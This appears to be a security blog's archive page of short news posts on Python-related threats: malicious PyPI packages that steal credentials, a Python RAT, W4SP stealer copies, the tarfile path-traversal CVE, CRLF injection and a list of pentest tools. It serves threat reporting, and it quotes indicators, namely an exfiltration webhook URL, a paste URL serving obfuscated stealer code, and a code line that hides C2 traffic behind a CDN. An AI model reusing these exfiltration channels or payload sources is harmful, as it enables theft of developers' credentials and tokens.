Feb 13 2023

Multiple 0-Day Attacks in The PyPI Packages Aimed to Steal Developer Credentials

Category: Python,Zero dayDISC @ 10:13 am

Recently, the FortiGuard Labs team made a groundbreaking discovery of several new zero-day attacks in the PyPI packages. The source of these attacks was traced back to a malware author known as “Core1337.” This individual had published a number of packages.

Here below we have mentioned the packages that are published by Core1337:-

  • 3m-promo-gen-api
  • Ai-Solver-gen
  • hypixel-coins
  • httpxrequesterv2
  • httpxrequester

Between the 27th of January and the 29th of January 2023, these attacks were published. The recent discovery made by the FortiGuard Labs team revealed that each of the packages published by the malware author “Core1337” had only one version with an empty description. 

However, what was alarming was the fact that all of these packages contained similar malicious code. This raises the question of the level of sophistication and the intentions behind these attacks. 

Technical Analysis of the Packages

First of all, cybersecurity analysts have noticed something that looks like a URL for a webhook in its setup[.]py file:-

  • hxxps://discord[.]com/api/webhooks/1069214746395562004/sejnJnNA3lWgkWC4V86RaFzaiUQ3dIAG958qwAUkLCkYjJ7scZhoa-KkRgBOhQw8Ecqd

There is a similar code in each package’s setup.py file except for the URL of the webhook that is sent from each package. It appears that the URL in question may have a connection to the infamous “Spidey Bot” malware. 

This particular strain of malware is notorious for its ability to pilfer personal information via Discord, as highlighted in a recent blog post by the organization. The blog, entitled “Web3-Essential Package,” delves into the dangers posed by the “Spidey Bot.”

Experts in the field have discovered potential malicious behaviors in a recent static analysis that was conducted by reviewing the setup.py script. During this process, the experts meticulously examined the code and were able to identify several key indicators that point toward malicious intent.

Experts in the field of malware analysis have gained a general understanding of the behavior of a particular strain of malware by carefully examining its primary function. 

According to their findings, this malware may attempt to extract sensitive information from various browsers and the Discord platform and then store it in a file for later exfiltration.

In order to gain a better understanding of the inner workings of this piece of malware, experts have focused their attention on the “getPassw” function. This function is specifically designed to gather user and password information from the browser and then save it to a text file.

The malware has a self-proclaimed title of “Fade Stealer,” which it prominently displays in the form of its name being written at the top of its accompanying text file.

As for its ‘getCookie’ function, the behavior is similar to the one seen in its other functions. Based on the functions of “Kiwi,” “KiwiFile,” and “uploadToAnonfiles,” it appears that the malware is programmed to scan specific directories and select specific file names for the purpose of transferring them through a file-sharing platform:- 

  • https[:]//transfer[.]sh

All these packages have one thing in common – they possess similar codes that are created for the purpose of launching attacks. While all these packages may have different names, the underlying intention and code structure is the same, which indicates the work of a single author.

Full Stack Python Security: Cryptography, TLS, and attack resistance

Tags: zero Day


Jan 27 2023

New Python Malware Targeting Windows Devices

Category: Malware,PythonDISC @ 10:26 am

The malware features also include file transfer, keylogging, stealing passwords stored in the browser, clipboard data stealing, cookies exfiltration and more.

Threat analysis firm Securonix’s cybersecurity researchers have discovered a new malware dubbed PY#RATION allowing attackers to steal sensitive files and log keystrokes from impacted devices.

Malware Distribution Technique

The malware is distributed through a conventional phishing mechanism in which the email contains a password-protected ZIP archive. When it is unpacked, two shortcut image files appear, titled front.jpg.lkn and back.jpg.lnk. When launched, these files display the front and back of a driver’s license that doesn’t exist.

New Python Malware Targeting Windows Devices
Images used in the scam (Credit: Securonix)

With this, the malicious code is also executed, leading to two new files being downloaded from the internet. These files are titled front.txt and back.txt, later renamed to .bat docs and executed. The malware disguises itself as Cortana virtual assistant to ensure persistence on the system.

What is PY#RATION

PY#RATION is a Python-based malware that displays a RAT (remote access trojan) like behaviour to sustain control over the affected host. The malware has various capabilities and functionalities, such as keylogging and data exfiltration.

However, the unique aspect is that it uses WebSocket for exfiltration and C2 communication, and evades detection from network security solutions and antivirus programs. Leveraging Python’s built-in Socket.IO framework that facilitates client and server WebSocket communications, the malware pulls data and gets commands over a single TCP connection through open ports simultaneously.

Moreover, according to a blog post published by Securonix, the attackers use the same C2 address, which the IPVoid checking system is yet to block. Researchers believe this malware is still under active development as they have detected multiple versions since August 2022. The malware receives instructions from the operations through WebSocket and obtains sensitive data.

Potential Dangers

This Python RAT is packed into an executable that uses automated packers such as ‘pyinstaller’ and ‘py2exe’ to convert Python code into Windows executables. This helps inflate payload size (The first detected version 1.0 being 14MB and the last detected version 1.6.0 being 32 MB containing 1000+ lines and additional code).

New Python Malware Targeting Windows Devices
Infection chain of the PY#RATION python malware (Credit: Securonix)

Researchers claim that the latest version of the payload remains undetected by all except for one antivirus engine listed on VirusTotal.

The malware features include file transfer to and from the C2 server, network enumeration, shell command execution, keylogging, stealing passwords stored in the browser, host enumeration, clipboard data stealing, and cookies exfiltration. Who’s behind this campaign, the distribution volume, and campaign objectives are still unclear.

Python for Cybersecurity: Using Python for Cyber Offense and Defense


InfoSec books
 | InfoSec tools | InfoSec services

Tags: Python Malware


Jan 23 2023

Learn Python and Learn it Well

Category: Information Security,PythonDISC @ 12:49 pm

Recommended source for more information

Checkout more titles for Learning Python Programming…

InfoSec books | InfoSec tools | InfoSec services

Tags: Python


Dec 27 2022

Hackers Deploy New Information Stealer Malware onto Python Developers’ Machines

Category: Malware,PythonDISC @ 10:48 am

Researchers at Phylum recently discovered that hackers had been injecting information stealer malware into Python developers’ machines in order to steal their information.

As they dug deeper, they discovered a new stealer variant with many different names. While apart from this, the source code of the program reveals that it is a straightforward copy of the old Stealer, W4SP. 

Attack Chain to Deploy Malware

A stealer in this case dropped directly into the main.py file rather than obfuscating the code or being obvious about the attempts to escape detection.

Only one instance has been found in which multiple stages were used in order to obfuscate and obscure the attacker’s intentions. In this case, the attacker used a package called chazz to pull obfuscated code from the klgrth.io website, using a simple first stage to get it.

There is a great deal of similarity between the first stage of the stealer code and the injector code. While this has been obfuscated with BlankOBF, it’s an obfuscation program. As soon as it is de-obfuscated, it reveals the Leaf $tealer.

Malicious Packages

Listed below are packages that feature similar IOC and apart from this, what we can expect is this list will grow over the coming months and years:-

  • modulesecurity – “Celestial Stealer”
  • informmodule – “Leaf $tealer”
  • chazz – first stage that pull from https://www.klgrth.io/paste/j2yvv/raw which contains the obfuscated code shown above
  • randomtime – “ANGEL stealer”
  • proxygeneratorbil – “@skid STEALER”
  • easycordey – “@skid Stealer”
  • easycordeyy – “@skid Stealer”
  • tomproxies – “@skid STEALER”
  • sys-ej – “Hyperion Obfuscated code”
  • infosys – “@734 Stealer”
  • sysuptoer – “BulkFA Stealer”
  • nowsys – “ANGEL Stealer”
  • upamonkws – “PURE Stealer”
  • captchaboy – “@skid STEALER”
  • proxybooster – “Fade Stealer”

W4SP Copies

W4SP’s original publication in loTus’s repository has been disabled by GitHub staff due to the violation of the T&C of GitHub, and as a result, it will be not found anymore.

It has been Phylum’s mission for some time to monitor the actions of these threat actors in an attempt to finally bring down their infrastructure, due to their persistent, pervasive, and egregious nature.

It was discovered that several copies of W4SP-Stealer started flashing under different names as soon as the repo for W4SP-Stealer was removed. This new stealer is even being distributed through PyPI by threat actors already, which is a sign that it is becoming a real threat.

It has been discovered that W4SP has been hosted in two GitHub repositories under two different aliases, each with its own purpose.

  • Satan Stealer
  • angel-stealer

There is a copy of the original source here, as well as the earlier versions of W4SP, hosted in an account titled aceeontop. 

W4SP Stealer will likely remain part of the scene for quite some time to come, as will their imitations and other variants.

There will be a constant increase in their number of attempts, their persistence, and their sophistication as time passes. However, Phylum ensured that it would mitigate and block supply chain attacks since its platform is capable enough in doing so.

Malware Analysis and Detection Engineering: A Comprehensive Approach to Detect and Analyze Modern Malware

Tags: Information Stealer Malware


Sep 26 2022

Python tarfile vulnerability affects 350,000 open-source projects (CVE-2007-4559)

Category: PythonDISC @ 8:27 am

Trellix Advanced Research Center published its research into CVE-2007-4559, a vulnerability estimated to be present in over 350,000 open-source projects and prevalent in closed-source projects.

CVE-2007-4559
Successful exploit

The vulnerability exists in the Python tarfile module which is a default module in any project using Python and is found extensively in frameworks created by Netflix, AWS, Intel, Facebook, Google, and applications used for machine learning, automation and docker containerization.

The vulnerability can be exploited by uploading a malicious file generated with two or three lines of simple code and allows attackers arbitrary code execution, or control of a target device.

“When we talk about supply chain threats, we typically refer to cyber-attacks like the SolarWinds incident, however building on top of weak code-foundations can have an equally severe impact,” said Christiaan Beek, Head of Adversarial & Vulnerability Research, Trellix. “This vulnerability’s pervasiveness is furthered by industry tutorials and online materials propagating its incorrect usage. It’s critical for developers to be educated on all layers of the technology stack to properly prevent the reintroduction of past attack surfaces.”

Open-source developer tools, like Python, are necessary to advance computing and innovation, and protection from known vulnerabilities requires industry collaboration. Researchers are working to push code via GitHub pull request to protect open-source projects from the vulnerability.

A free tool for developers to check if their applications are vulnerable is available on GitHub, and the complete research is available at Trellix.

Full Stack Python Security: Cryptography, TLS, and attack resistance

Tags: Python tarfile vulnerability


Sep 23 2022

A 15-Year-Old Unpatched Python bug potentially impacts over 350,000 projects

Category: PythonDISC @ 12:19 pm

More than 350,000 open source projects can be potentially affected by a 15-Year-Old unpatched Python vulnerability

More than 350,000 open source projects can be potentially affected by an unpatched Python vulnerability, tracked as CVE-2007-4559 (CVSS score: 6.8), that was discovered 15 years ago.

The issue is a Directory traversal vulnerability that resides in the ‘extract’ and ‘extractall’ functions in the tarfile module in Python. A user-assisted remote attacker can trigger the issue to overwrite arbitrary files via a .. (dot dot) sequence in filenames in a TAR archive, a related issue to CVE-2001-1267.

“While investigating an unrelated vulnerability, Trellix Advanced Research Center stumbled across a vulnerability in Python’s tarfile module. Initially we thought we had found a new zero-day vulnerability. As we dug into the issue, we realized this was in fact CVE-2007-4559.” reads the post published by security firm Trellix.”The vulnerability is a path traversal attack in the extract and extractall functions in the tarfile module that allow an attacker to overwrite arbitrary files by adding the “..” sequence to filenames in a TAR archive.”

The experts pointed out that the issue was underestimated, it initially received a CVSS score of 6.8, however, in most cases an attacker exploit this issue to gain code execution from the file write. Trellix shared a video PoC that shows how to get code execution by exploiting Universal Radio Hacker:

An attacker can exploit the flaw by uploading a specially crafted tarfile that allows escaping the directory that a file is intended to be extracted to and achieve code execution.

“For an attacker to take advantage of this vulnerability they need to add “..” with the separator for the operating system (“/” or “\”) into the file name to escape the directory the file is supposed to be extracted to. Python’s tarfile module lets us do exactly this:” continues the post.

tarfile python flaw.jpg

The tarfile module lets users add a filter that can be used to parse and modify a file’s metadata before it is added to the tar archive. This enables attackers to create their exploits with as little as the 6 lines of code above.”

The researchers built Creosote, a Python script that recursively looks through directories scanning for .py files and then analyzing them once they have been found. The script is used to automatically check repositories for vulnerability. Creosote provides as output the list of files that may contain vulnerabilities, sorting them into 3 categories based on confidence level (Vulnerable, Probably Vulnerable, Potentially Vulnerable).

Trellix added that the use of the Creosote tool revealed the existence of a vulnerability in the free and open-source scientific environment Spyder Python IDE Polemarch.

“As we have demonstrated above, this vulnerability is incredibly easy to exploit, requiring little to no knowledge about complicated security topics.” concludes the report. “Due to this fact and the prevalence of the vulnerability in the wild, Python’s tarfile module has become a massive supply chain issue threatening infrastructure around the world.”

Tags: Python bug


Jun 27 2022

Python packages with malicious code expose secret AWS credentials

Category: PythonDISC @ 7:48 am

Sonatype researchers have discovered Python packages that contain malicious code that peek into and expose secret AWS credentials, network interface information, and environment variables.

All those credentials and metadata then get uploaded to one or more endpoints, and anyone on the web can see this. Going up a directory level showed hundreds of TXT files containing sensitive information and secret.

In this Help Net Security video, Ax Sharma, Senior Security Researcher at Sonatype, explains the situation in more detail.

AWS keys

Python – How to access DB credentials from AWS Secrets Manager? 

Tags: secret AWS credentials


May 02 2022

Most Important Python Tools for Ethical Hackers & Penetration Testers 2022

Category: PythonDISC @ 11:32 pm
Python Tools

By Balaji N

There are a variety of python tools are using in the cybersecurity industries and the python is one of the widely used programming languages to develop the penetration testing tools.

Anyone who is involved in vulnerability research, reverse engineering or pen-testing, Cyber Security News suggests trying out the mastering in Python For Hacking From Scratch.

It has a highly practical but it won’t neglect the theory, so we’ll start with covering some basics about ethical hacking and python programming to advanced level.

The listed tools are written in Python, others are just Python bindings for existing C libraries and some of the most powerful tools pentest frameworks, bluetooth smashers, web application vulnerability scanners, war-dialers, etc. Here you can also find 1000 ofhacking tools.

Best Python Tools for Pentesters

Python Course & Papers

Network

  • ScapyScapy3k: send, sniff and dissect and forge network packets. Usable interactively or as a library
  • pypcapPcapy and pylibpcap: several different Python bindings for libpcap
  • libdnet: low-level networking routines, including interface lookup and Ethernet frame transmission
  • dpkt: fast, simple packet creation/parsing, with definitions for the basic TCP/IP protocols
  • Impacket: craft and decode network packets. Includes support for higher-level protocols such as NMB and SMB
  • pynids: libnids wrapper offering sniffing, IP defragmentation, TCP stream reassembly and port scan detection
  • Dirtbags py-pcap: read pcap files without libpcap
  • flowgrep: grep through packet payloads using regular expressions
  • Knock Subdomain Scan, enumerate subdomains on a target domain through a wordlist
  • SubBrute, fast subdomain enumeration tool
  • Mallory, extensible TCP/UDP man-in-the-middle proxy, supports modifying non-standard protocols on the fly
  • Pytbull: flexible IDS/IPS testing framework (shipped with more than 300 tests)
  • Spoodle: A mass subdomain + poodle vulnerability scanner
  • SMBMap: enumerate Samba share drives across an entire domain
  • Habu: python network hacking toolkit

Debugging and Reverse Engineering

  • Paimei: reverse engineering framework, includes PyDBG, PIDA, pGRAPH
  • Immunity Debugger: scriptable GUI and command line debugger
  • mona.py: PyCommand for Immunity Debugger that replaces and improves on pvefindaddr
  • IDAPython: IDA Pro plugin that integrates the Python programming language, allowing scripts to run in IDA Pro
  • PyEMU: fully scriptable IA-32 emulator, useful for malware analysis
  • pefile: read and work with Portable Executable (aka PE) files
  • pydasm: Python interface to the libdasm x86 disassembling library
  • PyDbgEng: Python wrapper for the Microsoft Windows Debugging Engine
  • uhooker: intercept calls to API calls inside DLLs, and also arbitrary addresses within the executable file in memory
  • diStorm: disassembler library for AMD64, licensed under the BSD license
  • Frida: A dynamic instrumentation framework which can inject scripts into running processes
  • python-ptrace: debugger using ptrace (Linux, BSD and Darwin system call to trace processes) written in Python
  • vdb / vtrace: vtrace is a cross-platform process debugging API implemented in python, and vdb is a debugger which uses it
  • Androguard: reverse engineering and analysis of Android applications
  • Capstone: lightweight multi-platform, multi-architecture disassembly framework with Python bindings
  • Keystone: lightweight multi-platform, multi-architecture assembler framework with Python bindings
  • PyBFD: Python interface to the GNU Binary File Descriptor (BFD) library
  • CHIPSEC: framework for analyzing the security of PC platforms including hardware, system firmware (BIOS/UEFI), and platform components.

Fuzzing

  • afl-python: enables American fuzzy lop fork server and instrumentation for pure-Python code
  • Sulley: fuzzer development and fuzz testing framework consisting of multiple extensible components
  • Peach Fuzzing Platform: extensible fuzzing framework for generation and mutation based fuzzing (v2 was written in Python)
  • antiparser: fuzz testing and fault injection API
  • TAOF, (The Art of Fuzzing) including ProxyFuzz, a man-in-the-middle non-deterministic network fuzzer
  • untidy: general purpose XML fuzzer
  • Powerfuzzer: highly automated and fully customizable web fuzzer (HTTP protocol based application fuzzer)
  • SMUDGE
  • Mistress: probe file formats on the fly and protocols with malformed data, based on pre-defined patterns
  • Fuzzbox: multi-codec media fuzzer
  • Forensic Fuzzing Tools: generate fuzzed files, fuzzed file systems, and file systems containing fuzzed files in order to test the robustness of forensics tools and examination systems
  • Windows IPC Fuzzing Tools: tools used to fuzz applications that use Windows Interprocess Communication mechanisms
  • WSBang: perform automated security testing of SOAP based web services
  • Construct: library for parsing and building of data structures (binary or textual). Define your data structures in a declarative manner
  • fuzzer.py (feliam): simple fuzzer by Felipe Andres Manzano
  • Fusil: Python library used to write fuzzing programs

Web

  • Requests: elegant and simple HTTP library, built for human beings
  • lxml: easy-to-use library for processing XML and HTML; similar to Requests
  • HTTPie: human-friendly cURL-like command line HTTP client
  • ProxMon: processes proxy logs and reports discovered issues
  • WSMap: find web service endpoints and discovery files
  • Twill: browse the Web from a command-line interface. Supports automated Web testing
  • Ghost.py: webkit web client written in Python
  • Windmill: web testing tool designed to let you painlessly automate and debug your web application
  • FunkLoad: functional and load web tester
  • spynner: Programmatic web browsing module for Python with Javascript/AJAX support
  • python-spidermonkey: bridge to the Mozilla SpiderMonkey JavaScript engine; allows for the evaluation and calling of Javascript scripts and functions
  • mitmproxy: SSL-capable, intercepting HTTP proxy. Console interface allows traffic flows to be inspected and edited on the fly
  • pathod / pathoc: pathological daemon/client for tormenting HTTP clients and servers
  • spidy: simple command-line web crawler with page downloading and word scraping

Forensics

  • Volatility: extract digital artifacts from volatile memory (RAM) samples
  • Rekall: memory analysis framework developed by Google
  • LibForensics: library for developing digital forensics applications
  • TrIDLib, identify file types from their binary signatures. Now includes Python binding
  • aft: Android forensic toolkit

Malware Analysis

  • pyew: command line hexadecimal editor and disassembler, mainly to analyze malware
  • Exefilter: filter file formats in e-mails, web pages or files. Detects many common file formats and can remove active content
  • pyClamAV: add virus detection capabilities to your Python software
  • jsunpack-n, generic JavaScript unpacker: emulates browser functionality to detect exploits that target browser and browser plug-in vulnerabilities
  • yara-python: identify and classify malware samples
  • phoneyc: pure Python honeyclient implementation
  • CapTipper: analyse, explore and revive HTTP malicious traffic from PCAP file

PDF

  • peepdf: Python tool to analyse and explore PDF files to find out if they can be harmful
  • Didier Stevens’ PDF tools: analyse, identify and create PDF files (includes PDFiDpdf-parser and make-pdf and mPDF)
  • Opaf: Open PDF Analysis Framework. Converts PDF to an XML tree that can be analyzed and modified.
  • Origapy: Python wrapper for the Origami Ruby module which sanitizes PDF files
  • pyPDF2: pure Python PDF toolkit: extract info, spilt, merge, crop, encrypt, decrypt…
  • PDFMiner: extract text from PDF files
  • python-poppler-qt4: Python binding for the Poppler PDF library, including Qt4 support

Misc

  • InlineEgg: toolbox of classes for writing small assembly programs in Python
  • Exomind: framework for building decorated graphs and developing open-source intelligence modules and ideas, centered on social network services, search engines and instant messaging
  • RevHosts: enumerate virtual hosts for a given IP address
  • simplejson: JSON encoder/decoder, e.g. to use Google’s AJAX API
  • PyMangle: command line tool and a python library used to create word lists for use with other penetration testing tools
  • Hachoir: view and edit a binary stream field by field
  • py-mangle: command line tool and a python library used to create word lists for use with other penetration testing tools
  • wmiexec.py: execute Powershell commands quickly and easily via WMI
  • Pentestly: Python and Powershell internal penetration testing framework
  • hacklib: Toolkit for hacking enthusiasts: word mangling, password guessing, reverse shell and other simple tools

Other Useful Libraries and Tools

  • IPython: enhanced interactive Python shell with many features for object introspection, system shell access, and its own special command system
  • Beautiful Soup: HTML parser optimized for screen-scraping
  • matplotlib: make 2D plots of arrays
  • Mayavi: 3D scientific data visualization and plotting
  • RTGraph3D: create dynamic graphs in 3D
  • Twisted: event-driven networking engine
  • Suds: lightweight SOAP client for consuming Web Services
  • M2Crypto: most complete OpenSSL wrapper
  • NetworkX: graph library (edges, nodes)
  • Pandas: library providing high-performance, easy-to-use data structures and data analysis tools
  • pyparsing: general parsing module
  • lxml: most feature-rich and easy-to-use library for working with XML and HTML in the Python language
  • Whoosh: fast, featureful full-text indexing and searching library implemented in pure Python
  • Pexpect: control and automate other programs, similar to Don Libes `Expect` system
  • Sikuli, visual technology to search and automate GUIs using screenshots. Scriptable in Jython
  • PyQt and PySide: Python bindings for the Qt application framework and GUI library

Books

Talks, slides and articles

Mastering Python for Networking and Security

Mastering Python for Networking and Security: Leverage the scripts and  libraries of Python version 3.7 and beyond to overcome networking and  security issues, 2nd Edition: 9781839217166: Computer Science Books @  Amazon.com

Tags: Python


Jan 17 2022

Learning Python: From Zero to Hero

Category: PythonDISC @ 2:32 pm

Develop your own Hackingtools with Python in Kali-Linux

Using Python for Cyber Offense and Defense

Tags: Develop your own Hackingtools with Python in Kali-Linux, Using Python for Cyber Offense and Defense


Dec 07 2021

Improper Neutralization of CRLF Sequences in Java Applications

Category: App Security,File Security,Information Security,PythonDISC @ 10:28 am

CRLF Injection

Let’s try to understand what CRLF injection is. In response to an HTTP request from a web browser, a web server sends a response, which contains both the HTTP headers and the actual content of the website. There is a special combination of characters that separates the HTTP headers from the HTML response (the website content), namely a carriage return followed by a line feed.

When a header ends with a CRLF, a new header is created on the server. So, a web application or a user will know when a new line begins in a file or text block.

An attacker can inject information into HTTP responses by using the CRLF characters that separate HTTP responses. As long as the header and body end in *CRLF>*CRLF>, the browser will understand that the header ends. Consequently, they have the option to store data in the body of the answer, where HTML is stored.

If an attacker enters the ASCII code for carriage return (%0d) and line feed (%0a) in a HTTPS header, they could identify them easily. The result would look like this:

https://xyz.com/index.php?page=home%0d%0a

Table of Contents

Java 9 Dependency Injection

Tags: CRLF Injection


Nov 23 2021

Experts found 11 malicious Python packages in the PyPI repository

Category: PythonDISC @ 10:15 am

JFrog researchers have discovered 11 malicious Python packages in the Python Package Index (PyPI) repository that can steal Discord access tokens, passwords, and even carry out dependency confusion attacks.

Below is the list of malicious Python packages:

  • importantpackage / important-package
  • pptest
  • ipboards
  • owlmoon
  • DiscordSafety
  • trrfab
  • 10Cent10 / 10Cent11
  • yandex-yt
  • yiffparty

The packages “importantpackage,” “10Cent10,” and “10Cent11” were able to establish a reverse shell on the compromised machine.

Experts pointed out that the “importantpackage” abused CDN TLS termination for data exfiltration. It uses the Fastly CDN to disguise communications with the C2 server as a communication with pypi.org.

“The malware’s communication is quite simple:

url = "https://pypi.python.org" + "/images" + "?" + "guid=" + b64_payload r = request.Request(url, headers = {'Host': "psec.forward.io.global.prod.fastly.net"})

This code causes an HTTPS request to be sent to pypi.python.org (which is indistinguishable from a legitimate request to PyPI,) which later gets rerouted by the CDN as an HTTP request to the C2 server psec.forward.io.global.prod.fastly.net (and vice versa, allowing for two-way communication).” states the report published by JFrog.

Modern Computing in Simple Packages

Tags: PyPI repository, Python packages


May 13 2019

Most popular programming languages on stack overflow

Category: App Security,PythonDISC @ 4:26 pm

Most popular programming languages


 Subscribe in a reader





Mar 23 2019

Python Cheat Sheets

Category: Cheat Sheet,Hacking,Python,Security ToolsDISC @ 8:59 pm

Beginner’s Python Cheat Sheet

Python Crash Course – Cheat Sheets